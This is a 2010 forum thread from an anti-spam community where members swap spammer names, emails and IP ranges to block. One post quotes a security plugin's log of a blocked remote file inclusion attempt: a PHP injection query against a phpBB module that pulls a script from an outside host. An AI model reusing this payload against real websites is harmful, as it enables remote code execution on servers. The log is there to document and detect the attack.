You are not logged in.

#1 2010-02-19 1:13 pm

Alessandra
Member
From: Chicago, Illinois, USA
Registered: 2009-11-29
Posts: 165
Website

Not Subtle

Boy, I didn't even have to look up this one:

PornDownload
porndownload@mail.ru
188.92.74.81

(By the way, I think it's the same entity as:

masterthomas
masterthomas@mail.ru
94.142.131.180
)

Offline

#2 2010-02-19 11:39 pm

computerforumz
Member
From: Texas
Registered: 2010-01-15
Posts: 40
Website

Re: Not Subtle

True.  Some spammers just make it too easy for us to identify and ban them.

Offline

#3 2010-02-20 12:28 am

MysteryFCM
Member
From: Tyneside, UK
Registered: 2008-01-16
Posts: 605
Website

Re: Not Subtle

I'd strongly urge you block both at the range level.

94.142.128.0/21 = CSSGROUP (known criminals)
188.92.74.0/24 = Latvian ISP known for spam


Regards
Steven Burn
Ur I.T. Mate Group / hpHosts
it-mate.co.uk / hosts-file.net

Offline

#4 2010-02-23 12:23 pm

EOC_Jason
Member
Registered: 2010-01-28
Posts: 50

Re: Not Subtle

I got one with a username & email something like "LesbianPorn"... That wasn't blatantly obvious... *rolleyes*

Offline

#5 2010-02-23 2:20 pm

Spud
Member
From: Kent, UK
Registered: 2009-09-08
Posts: 206
Website

Re: Not Subtle

I have yet to see 'Palmela Wristaction' being used wink


Spam - Uninteresting garbage quickly deleted.
Spammer - A parasitic worm intent on creating internet misery.

ISS Views, Views and News on The State of Digital Security

Offline

#6 2010-02-23 2:29 pm

zaphod
Jägermonster
From: USA
Registered: 2008-11-22
Posts: 2,107
Website

Re: Not Subtle

Strange, but the lesbos angle is getting played alot more. Witness this (miserably failed) RFI attempt.

#: 20769 @: Tue, 23 Feb 2010 10:31:56 -0700
Host: neptune.ausip.net.au
IP: 202.60.90.76
Score: 13
Why blocked: RFI attack/SQL injection (nested percent and '). General CMS/RFI attack. General CMS/RFI attack. General CMS attack. Question mark at end of query. Badly formed query, must not have 2 question marks in a row. Badly formed query, must not have 3 question marks in a row even with escaping. RFI (http). Globvar hack. Nesting attack. no access allowed from Korea. Site does NOT use server path_info. Errant path attempting a remote file include. 
Query: name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.lesbiansexst0ry.tv/linkex/byz9991.txt???
Referer: 
User Agent: Mozilla/5.0
Reconstructed URL: http:// www.spambotsecurity.com /blog/archives/cat_rbn.php//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.lesbiansexst0ry.tv/linkex/byz9991.txt???

Looks to me like the dragon is eating it's own tail there! Infecting smut site link exchanges (0 for o substitution to break URL) to distribute botscripts.

What a mess, eh?

Zap smile


Get Protected, Stay Protected...
With ZB Block, GNU/GPL Freeware Anti-Spam/Anti-Hack protection for your php based website.

Offline

#7 2010-02-24 10:46 am

Alessandra
Member
From: Chicago, Illinois, USA
Registered: 2009-11-29
Posts: 165
Website

Re: Not Subtle

Thanks, Steven, for
"I'd strongly urge you block both at the range level.

94.142.128.0/21 = CSSGROUP (known criminals)
188.92.74.0/24 = Latvian ISP known for spam"

Oddly enough, I'd already blocked the first range on a hunch and a bunch of attempted registrations.  Thanks to you I just blocked the second one, which I note had one try on our forum.

Offline

#8 2010-02-24 12:22 pm

ih8spam
Member
Registered: 2009-03-25
Posts: 266

Re: Not Subtle

showed up on my board this morning  lol

Guest     75.92.144.113    Wed Feb 24, 2010 3:46 am   
Username: Sex Pics
E-mail: sex.picsnow@gmail.com


"Two years from now, spam will be solved."
Bill Gates, founder of Microsoft, 2004

Offline

#9 2010-02-24 6:11 pm

jokeroo essex
Member
From: southend,essex,England
Registered: 2008-11-01
Posts: 117
Website

Re: Not Subtle

ih8spam wrote:

showed up on my board this morning  lol

Guest     75.92.144.113    Wed Feb 24, 2010 3:46 am   
Username: Sex Pics
E-mail: sex.picsnow@gmail.com

Yep,LOL,he tried us too.
Checking the database he's been reported 42 times so far.
40 times by that login and 2 by lesbian porn.
If he's going to hit that hard you'd think he'd use some brains LOL

Offline

Board footer

Powered by FluxBB